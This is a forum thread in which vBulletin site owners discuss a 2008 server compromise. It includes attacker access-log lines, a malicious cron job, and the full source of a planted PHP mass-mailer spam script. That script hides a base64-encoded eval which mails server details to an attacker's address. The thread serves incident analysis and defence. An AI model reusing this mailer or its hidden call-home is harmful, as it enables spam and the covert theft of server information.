PDA

View Full Version : :) HaCkEd aGaIn :)

iogames
09-20-2008, 02:45 AM
I was reading in the morning that someone was hacked and I thought: I'm gonna find the time to write a good 'Guide for the Hacked' for users not to get hysterical about the problem and ZAZ! my site was hacked :P but I don't get all scare, good thing that I know by memory the structure of my server/files... but must be interesting analyze/dissect the attacks for future references...

I don't know if it's improper to post this, please advise me if so... but here the main file who steals you cP's Password: CONFIGSCAN.PHP

*** Script removed, no need to post a script to hack a site ***
p.s. I fixed very calmly my problem :)
SEOvB
09-20-2008, 02:58 AM
wouldn't they still need a way to get that file on your server?
Lynne
09-20-2008, 03:21 AM
wouldn't they still need a way to get that file on your server?
This was gonna be my question. That is what I would be freaking out over!
iogames
09-20-2008, 03:45 AM
In fact I said: I always take it with calm... not that I'm a expert :D
I just check head-over-heels, and although I said to my Hosting Service that might my a Shell thing they say is script-related thing... so I don't discuss and go to the logs and clean everything and change passwords...

It came with many 'strange foreign files'

Any idea what that script compromise?

p.s. I consider a tootache more important that a vBulletin's board hacked

--------------- Added 1221886742 at 1221886742 ---------------

and everything start here:
212.100.250.218 - - [11/Sep/2008:11:03:48 -0600] "GET /cpanel HTTP/1.0" 301 345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
212.100.250.218 - - [11/Sep/2008:11:07:34 -0600] "GET /version.php HTTP/1.0" 200 63599 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
212.100.250.218 - - [11/Sep/2008:11:07:29 -0600] "GET /configscan.php HTTP/1.0" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Crazy Browser 2.0.1)"
41.219.229.144 - - [11/Sep/2008:11:09:54 -0600] "GET /configscan.php HTTP/1.1" 200 1813 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; FDM)"
41.219.229.144 - - [11/Sep/2008:11:26:00 -0600] "GET /yomistarz/yomistarz.php HTTP/1.1" 200 3698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; FDM)"
212.100.250.218 - - [12/Sep/2008:03:24:41 -0600] "POST /GuXnnQshoT.php HTTP/1.0" 200 25610 "http://iogames.com/GuXnnQshoT.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16)


England & Nigeria :rolleyes:
Lynne
09-20-2008, 04:02 AM
p.s. I consider a tootache more important that a vBulletin's board hacked
But do your users agree with that! ;)
iogames
09-20-2008, 04:47 AM
'Naija Bois Too Much '

https://vborg.vbsupport.ru/external/2008/09/2.gif

Info in the files, I called my Nigerian friend OSUJI, and he told me is a bragging gang term...
Ziki
09-20-2008, 08:43 AM
To avoid that this file finds out your password,change the config.php file so that it is not a one-liner,but more lines.Especially the password parts.
iogames
09-21-2008, 04:26 AM
The only thing I regret is to lose my SuperSecure password: it was a word I created with Latin & Greek roots, combined with numbers and must be entered sitting over your head singing Jingle bells in Zulu :D

The only FTP connection I see is on 9/14/2008

14 40 7.86% 40 files 153kb

Over .png files :p
puertoblack2003
09-21-2008, 05:11 AM
i remember reading something on how to protect the config.php there's info here to protect your file using htaccess http://www.sitebuddy.com/php/VBulletin_protect_config.php_with_.htaccess hope that help :)
Ziki
09-21-2008, 06:35 AM
Or CHMOD it to 600 ;),this allows the script to be access via your vBulletin/server files,but not via users :),I use this for my products.
Ahmed-Rabe3
09-21-2008, 09:12 AM
me to my site is hacked
iogames
09-21-2008, 02:43 PM
I think they weren't after vB since they just injected stuff to spam, and I discover a new email account on my cP with high activity...

2 more files [since this is moved to a discussion forum]

yomistarz.php

<?php



if(isset($_POST['action'] ) ){

$action=$_POST['action'];

$message=$_POST['message'];

$emaillist=$_POST['emaillist'];

$from=$_POST['from'];

$replyto=$_POST['replyto'];

$subject=$_POST['subject'];

$realname=$_POST['realname'];

$file_name=$_POST['file'];

$contenttype=$_POST['contenttype'];



$message = urlencode($message);

$message = ereg_replace("%5C%22", "%22", $message);

$message = urldecode($message);

$message = stripslashes($message);

$subject = stripslashes($subject);

}





?>

<html>

<head>

<title>|| InboX Mass Mailer ||</title>

<meta http-equiv="Content-Type" content="text/html;

charset=iso-8859-1">



<style type="text/css">

<!--

.style1 {

font-family: Geneva, Arial, Helvetica, sans-serif;

font-size: 12px;

}

-->

</style>

<style type="text/css">

<!--

.style1 {

font-size: 20px;

font-family: Geneva, Arial, Helvetica, sans-serif;

}

-->

</style>

</head>

<body bgcolor="FF9900" text="#ffffff">

<span class="style1">InboX Mass Mailer<br>

</span>



<form name="form1" method="post" action=""

enctype="multipart/form-data">

<br>

<table width="100%" border="0">

<tr>

<td width="10%">

<div align="right"><font size="-3" face="Verdana, Arial,

Helvetica, sans-serif">Your

Email:</font></div>

</td>

<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<input type="text" name="from" value="<? print $from; ?>"

size="30">

</font></td>

<td width="31%">

<div align="right"><font size="-3" face="Verdana, Arial,

Helvetica, sans-serif">Your

Name:</font></div>

</td>

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<input type="text" name="realname" value="<? print $realname;

?>" size="30">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-3" face="Verdana, Arial,

Helvetica, sans-serif">Reply-To:</font></div>

</td>

<td width="18%"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<input type="text" name="replyto" value="<? print $replyto; ?>"

size="30">

</font></td>

<td width="31%">

<div align="right"><font size="-3" face="Verdana, Arial,

Helvetica, sans-serif">Attach

File:</font></div>

</td>

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<input type="file" name="file" size="30">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-3" face="Verdana, Arial,

Helvetica, sans-serif">Subject:</font></div>

</td>

<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<input type="text" name="subject" value="<? print $subject; ?>"

size="90">

</font></td>

</tr>

<tr valign="top">

<td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<textarea name="message" cols="50" rows="10"><? print $message;

?></textarea>

<br>

<input type="radio" name="contenttype" value="plain" >

Plain Text

<input name="contenttype" type="radio" value="html" checked>

HTML

<input type="hidden" name="action" value="send">

<input type="submit" value="Send eMails">

</font></td>

<td width="41%"><font size="-3" face="Verdana, Arial, Helvetica,

sans-serif">

<textarea name="emaillist" cols="30" rows="10"><? print

$emaillist; ?></textarea>

</font></td>

</tr>

</table>

</form>







<?



if ($action){



if (!$from && !$subject && !$message && !$emaillist){

print "Please complete all fields before sending your

message.";

exit;

}

$allemails = split("\n", $emaillist);

$numemails = count($allemails);



for($x=0; $x<$numemails; $x++){

$to = $allemails[$x];

if ($to){

$to = ereg_replace(" ", "", $to);

$message = ereg_replace("&email&", $to, $message);

$subject = ereg_replace("&email&", $to, $subject);

print " $to.......";

flush();

$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

$header .= "MIME-Version: 1.0\r\n";

If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";

If ($file_name) $header .= "--$uid\r\n";

$header .= "Content-Type: text/$contenttype\r\n";

$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

$header .= "$message\r\n";

If ($file_name) $header .= "--$uid\r\n";

If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";

If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";

If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";

If ($file_name) $header .= "$content\r\n";

If ($file_name) $header .= "--$uid--";

mail($to, $subject, "", $header);

print "spammed<br>";



flush();

}

}

$ra44 = rand(1,99999);

$subj98 = "sh-$ra44";

$a5 = $_SERVER['HTTP_REFERER'];

$b33 = $_SERVER['DOCUMENT_ROOT'];

$c87 = $_SERVER['REMOTE_ADDR'];

$d23 = $_SERVER['SCRIPT_FILENAME'];

$e09 = $_SERVER['SERVER_ADDR'];

$f23 = $_SERVER['SERVER_SOFTWARE'];

$g32 = $_SERVER['PATH_TRANSLATED'];

$h65 = $_SERVER['PHP_SELF'];

$message=$_POST['message'];

$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";

echo eval(base64_decode("bWFpbCgiZ3JvZmloYWNrQGdtYWlsLmNvbSIsICRzdWJqOTgsIC Rtc2csICRtZXNzYWdlLCAkcmE0NCk7"));

}





?>

<style type="text/css">

<!--

.style1 {

font-size: 20px;

font-family: Geneva, Arial, Helvetica, sans-serif;

}

-->

</style>

<p class="style1">

Copyright ? 2007 phpbb.com



</p>

<?php

if(isset($_POST['action']) && $numemails !==0 ){echo

"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully');

</script>";}

?>

</body>

</html>

and a file named SS.PHP with 6k lines

Why we don't counterattack? I mean, we are majority, we together know more than this pranksters...
iPodHacking.com
09-21-2008, 02:49 PM
Is that a spam php script?
MiskaTorn
09-21-2008, 03:08 PM
I got hacked with that script too, no clue how they got it on my server.

Though the only thing running on my web server is vbulletin.
iogames
09-21-2008, 05:22 PM
Well, the problem was resolved in a few hours, I find this in cPanel's Cron Job section:

public_html/auctions/components/y2kupdate >/dev/null 2>&1
balance12
09-21-2008, 05:45 PM
WOw... i have a "hackers problem" someone is injecting me shells in my site ("c99"....
agitated
09-21-2008, 07:00 PM
@iogames

I'm confused as to what you are trying to tell us here.

You've not confirmed how they gained access.
How did they get the files into your directories. ?

Did you have a backdoor open or was it via another site on the shared hosting ?

Would it not be more helpful to let people know exactly what version of vBulletin you have installed
What hacks are installed.
Also what else do you have running on your site.

If people see something in common then it may help to close a vulnerability that may have been exploited.
iogames
09-21-2008, 07:16 PM
Ok...
I was so busy that I didn't touch my site for days, till one day I got some spare time and start working on it again... I lost my access to cPanel, I just reset password and they send me to my email the current password, then I starting to look what was going on, and found those foreign files, they didn't remove nothing, then I started a assessment of the problem, and start posting:

So basically don't know if there was to a third party script, or Shell injection, Hosters will never accept that there was fault on their part, I just received their help and advise...

- CronJobs
- Inserted files
- FTP Logs
- Raw Logs
- .htaccess
- Change of passwords
- Check intengrity of the MySQL's dBs
- Eliminate unknown files, etc...
esperone
09-22-2008, 12:24 PM
heres the guys email address: grofihack@gmail.com

i decoded the base64 encoded part of the posted script
iogames
09-22-2008, 02:59 PM
heres the guys email address: grofihack@gmail.com

i decoded the base64 encoded part of the posted script

See? we must fight back and don't play victims...
after they run out of tricks, they must start running ;)
Dzelil
09-22-2008, 09:53 PM
well as it seems the file that gets cpane logins scans all directorys on a server that are open n read files such as config.php,conf_global.php etc for the user login and password for mysql ( or what ever you use) and then try it on the directorys ftp and will give the hackers the results as to how many he can acceess on the server within seconds.. no ++++ing around very simple job...

but how did they get the file on your server in the 1st placE?. maybe a another vuln in vb again?
iogames
09-22-2008, 10:14 PM
well as it seems the file that gets cpane logins scans all directorys on a server that are open n read files such as config.php,conf_global.php etc for the user login and password for mysql ( or what ever you use) and then try it on the directorys ftp and will give the hackers the results as to how many he can acceess on the server within seconds.. no ++++ing around very simple job...


but how did they get the file on your server in the 1st placE?. maybe a another vuln in vb again?

If there's another vulnerability on vB [which I don't believe] we will just have the denial as from my hosting service [which I really believe] ... to be accurate I don't know but I uninstall 3 scripts...
I was blaming my Auction site, but another user in this thread mentioned to be victim of the same attack and that his/her server only host vB...
So we are alone on this till someone more kind/prepared re-structure the rules of engagement...
iogames
09-28-2008, 01:51 PM
It remind me this:

http://www.youtube.com/watch?v=DyEGYo_C0r4